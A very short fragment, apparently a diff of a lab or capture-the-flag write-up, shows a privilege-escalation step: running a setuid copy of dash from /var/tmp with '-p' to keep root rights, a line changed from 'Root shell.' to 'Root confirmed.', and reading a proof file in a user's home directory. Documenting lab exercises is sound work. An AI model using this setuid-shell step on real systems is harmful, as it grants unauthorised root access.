0x00 Introduction

 /var/tmp/dash -p

-Root shell.
+Root confirmed.

 cat /home/miguel/proof.txt